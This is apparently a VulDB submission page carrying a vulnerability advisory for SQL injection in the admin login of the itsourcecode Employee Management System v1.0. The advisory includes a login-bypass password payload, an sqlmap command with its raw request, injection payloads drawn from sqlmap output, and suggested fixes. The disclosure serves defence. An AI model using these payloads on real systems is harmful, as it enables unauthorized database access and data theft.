إرسال #621482: itsourcecode employee-management-system-php-mysql-source-code v1.0 SQL Injectionالمعلومات

عنوانitsourcecode employee-management-system-php-mysql-source-code v1.0 SQL Injection
الوصف# Employee Management System v1.0/admin/index.php Administrator user backend login SQL injection. # NAME OF AFFECTED PRODUCT(S) - Employee Management System ## Vendor Homepage - https://itsourcecode.com/ # AFFECTED AND/OR FIXED VERSION(S) ## submitter mawenjie ## VERSION(S) - V1.0 ## Software Link - https://itsourcecode.com/free-projects/php-project/employee-management-system-php-mysql-source-code/ # PROBLEM TYPE ## Vulnerability Type - SQL injection ## Root Cause An SQL injection vulnerability was discovered in the "/admin/index.php" administrator backend login box of the employee management system project. The website can directly use a "universal password" of 1=1 for breakthrough login and be directly applied to SQL queries without the need for appropriate cleaning or verification. This enables attackers to forge input values, thereby conducting vertical SQL queries and performing unauthorized actions. ## Impact Attackers can exploit this SQL injection vulnerability to achieve unauthorized database access, sensitive data leakage, data tampering, comprehensive system control, and even service interruption, posing a serious threat to system security and business continuity. # DESCRIPTION An SQL injection vulnerability was discovered in the "/admin/index.php" administrator backend login box of the employee management system project. The website can directly use a "universal password" of 1=1 for breakthrough login and be directly applied to SQL queries without the need for appropriate cleaning or verification. The reason is that in the '/admin/index.php' file, the code receives the login request data and then enters the database for query. Unfiltered SQL statements that directly link to the connection have few restrictions and are unfiltered, posing security risks. <img width="870" height="272" alt="Image" src="https://github.com/user-attachments/assets/a55a12be-684c-402e-9172-4acd78877289" /> # Vulnerability verification ```bash python3 sqlmap.py -r sql.txt --dbs --batch ``` ### The content of sql.txt ```makefile POST /admin/index.php HTTP/1.1 Host: 192.168.126.133:8090 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:140.0) Gecko/20100101 Firefox/140.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate, br Content-Type: application/x-www-form-urlencoded Content-Length: 48 Origin: http://192.168.126.133:8090 Connection: keep-alive Referer: http://192.168.126.133:8090/admin/index.php Cookie: PHPSESSID=rp7062bma2u82kio6lthfm4ov0 Upgrade-Insecure-Requests: 1 Priority: u=0, i username=admin&Password=or+1%3D1+%23&login=login ``` ```makefile --- Parameter: username (POST) Type: boolean-based blind Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment) Payload: username=-6938' OR 2773=2773#&Password=or 1=1 #&login=login Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) Payload: username=admin' AND (SELECT 6313 FROM(SELECT COUNT(*),CONCAT(0x716b6b7071,(SELECT (ELT(6313=6313,1))),0x71766a7a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- HuJZ&Password=or 1=1 #&login=login Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: username=admin' AND (SELECT 3140 FROM (SELECT(SLEEP(5)))aMkO)-- Enks&Password=or 1=1 #&login=login --- [21:37:01] [INFO] the back-end DBMS is MySQL web application technology: Apache 2.4.39, PHP 5.5.9 ``` <img width="859" height="240" alt="Image" src="https://github.com/user-attachments/assets/9385d330-15fb-4637-837f-bceadbfdba83" /> # Suggested repair 1. **Use prepared statements and parameter binding:** Preparing statements can prevent SQL injection as they separate SQL code from user input data. When using prepare statements, the value entered by the user is treated as pure data and will not be interpreted as SQL code. 2. **Input validation and filtering:** Strictly validate and filter user input data to ensure it conforms to the expected format. 3. **Minimize database user permissions:** Ensure that the account used to connect to the database has the minimum necessary permissions. Avoid using accounts with advanced permissions (such as' root 'or' admin ') for daily operations. 4. **Regular security audits:** Regularly conduct code and system security audits to promptly identify and fix potential security vulnerabilities.
المصدر⚠️ https://github.com/XiaoJiesecqwq/CVE/issues/5
المستخدم
 Anonymous User
ارسال23/07/2025 03:59 PM (9 أشهر منذ)
الاعتدال25/07/2025 09:45 AM (2 days later)
الحالةتمت الموافقة
إدخال VulDB317586 [itsourcecode Employee Management System 1.0 /admin/index.php أسم المستخدم حقن SQL]
النقاط20

التالي نظرة عامة السابق

Are you interested in using VulDB?

Download the whitepaper to learn more about our service!